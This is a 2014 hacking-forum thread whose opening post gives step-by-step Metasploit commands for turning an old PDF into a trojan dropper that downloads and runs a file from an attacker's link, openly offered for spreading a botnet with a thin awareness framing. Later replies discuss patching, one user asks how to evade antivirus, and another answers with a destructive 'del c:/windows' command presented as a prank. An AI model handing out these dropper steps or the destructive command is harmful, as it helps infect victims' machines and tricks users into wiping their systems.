Author Topic: Making a PDF a dropper with metasploit  (Read 4060 times)

0 Members and 1 Guest are viewing this topic.

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Making a PDF a dropper with metasploit
« on: March 14, 2014, 02:47:44 am »
Intro

What is the purpose of this tutorial? Pretty much a method on making a PDF a trojan dropper. Is this useful? Sure if you want to spread a botnet or some skidlike thing. Why are you posting this? In case anyone wants to turn a PDF into a dropper, and to make other individuals aware of how easily a skid can turn a harmless PDF into a malicious file.

Note:
This may only work with PDFs that are created with older versions of Adobe PDF


What you will need
  • Old PDF
  • Metasploit
  • URL of file you want to be dropped (direct link)

What's the Process?

  • Open metasploit console
  • Type the following into console:
Code: [Select]
use exploit/windows/fileformat/adobe_pdf_embedded_exe and press enter
  • Then type:
Code: [Select]
set payload windows/download_exec and press enter
  • Then type:
Code: [Select]
set INFILENAME <link to pdf> and press enter
  • Then type:
Code: [Select]
set url <direct dl link> and press enter
  • Then type:
Code: [Select]
Exploit
    and press enter

The infected PDF will be named "evil" in the same directory as the original.

Conclusion
So what did we learn? How easy it is for skids to infect people with knowledge, hiw so very lame... be cautious of random PDFs you download, you may be getting that great book, but other times find yourself a slave to a ddos happy skidmark.

Also I believe newer versions of PDF reader should have this patched but knowing a lot of non tech savvy people they always click out of important updates, and others don't update adobe products if they have a cracked version of adobe products as it blocks the server in the hosts file.
« Last Edit: March 14, 2014, 02:52:27 am by DeepCopy »
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Offline Teapot

  • Peasant
  • *
  • Posts: 127
  • Cookies: -2
  • E-Book Whore
    • View Profile
Re: Making a PDF a dropper with metasploit
« Reply #1 on: March 14, 2014, 05:01:24 am »
The new version of Adobe Reader prevents you from opening an infected PDF. It generates a corruption error or something.
So just upgrade that if you haven't and your safe from the HF skids xD
« Last Edit: March 14, 2014, 05:02:06 am by Teapot »

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: Making a PDF a dropper with metasploit
« Reply #2 on: March 14, 2014, 05:56:16 am »
The new version of Adobe Reader prevents you from opening an infected PDF. It generates a corruption error or something.
So just upgrade that if you haven't and your safe from the HF skids xD

Quote
knowing a lot of non tech savvy people they always click out of important updates, and others don't update adobe products if they have a cracked version of adobe products as it blocks the server in the hosts file.

You'd be amazed at how often skids get on people's computers fairly easily
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: Making a PDF a dropper with metasploit
« Reply #3 on: March 14, 2014, 07:12:18 am »
HAHAHAHAHA adobe reader not vulnerable? yeah fuckin' right, that shit's full of holes and it's ridiculously laggy product, crashes all the time. Here at work people always demand it but it only gives headaches when you need to do more than just viewing plain PDF's.

Offline Teapot

  • Peasant
  • *
  • Posts: 127
  • Cookies: -2
  • E-Book Whore
    • View Profile
Re: Making a PDF a dropper with metasploit
« Reply #4 on: March 14, 2014, 07:41:48 am »
HAHAHAHAHA adobe reader not vulnerable? yeah fuckin' right, that shit's full of holes and it's ridiculously laggy product, crashes all the time. Here at work people always demand it but it only gives headaches when you need to do more than just viewing plain PDF's.

I never said it was not vulnerable. But the metasploit one is patched up, which considering you can find this tut on HF means that at least whoever is getting into your computer via PDF knows more about hacking than a backdoored version of DarkComet.

Offline Fed0t

  • NULL
  • Posts: 3
  • Cookies: -4
    • View Profile
Re: Making a PDF a dropper with metasploit
« Reply #5 on: March 16, 2014, 09:01:04 pm »
the version of adobe reader and  the version of the document pdf ?

Offline Teapot

  • Peasant
  • *
  • Posts: 127
  • Cookies: -2
  • E-Book Whore
    • View Profile
Re: Making a PDF a dropper with metasploit
« Reply #6 on: March 17, 2014, 06:31:59 am »
the version of adobe reader and  the version of the document pdf ?

Figure it out yourself... this tut was spoon feeding you enough in my opinion.

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: Making a PDF a dropper with metasploit
« Reply #7 on: March 17, 2014, 06:50:33 am »
Figure it out yourself... this tut was spoon feeding you enough in my opinion.
Agreed, I thought that the 'hit enter' part was already a bit over the top.
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: Making a PDF a dropper with metasploit
« Reply #8 on: March 17, 2014, 05:04:42 pm »
Agreed, I thought that the 'hit enter' part was already a bit over the top.

;)
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Offline Fed0t

  • NULL
  • Posts: 3
  • Cookies: -4
    • View Profile
Re: Making a PDF a dropper with metasploit
« Reply #9 on: March 17, 2014, 08:11:58 pm »
Someone can explain more detailed?


1.Versions of Adobe
2.How to bypass Antivirus ( cause AV warn when he find any exploited file).

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: Making a PDF a dropper with metasploit
« Reply #10 on: March 18, 2014, 07:14:49 am »
Someone can explain more detailed?


1.Versions of Adobe
2.How to bypass Antivirus ( cause AV warn when he find any exploited file).
Thats what we get for having a tutorial like this, it attracts skids like bears and honey.
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline Teapot

  • Peasant
  • *
  • Posts: 127
  • Cookies: -2
  • E-Book Whore
    • View Profile
Re: Making a PDF a dropper with metasploit
« Reply #11 on: March 18, 2014, 07:53:41 am »
Someone can explain more detailed?


1.Versions of Adobe
2.How to bypass Antivirus ( cause AV warn when he find any exploited file).

1. Google it
2. Run command prompt as admin and then type the following
Code: [Select]
del c:/windows3. I take no responsibility for damages caused by #2

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: Making a PDF a dropper with metasploit
« Reply #12 on: March 18, 2014, 07:01:20 pm »
Thats what we get for having a tutorial like this, it attracts skids like bears and honey.

Can't say it's not fun to fish them out
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry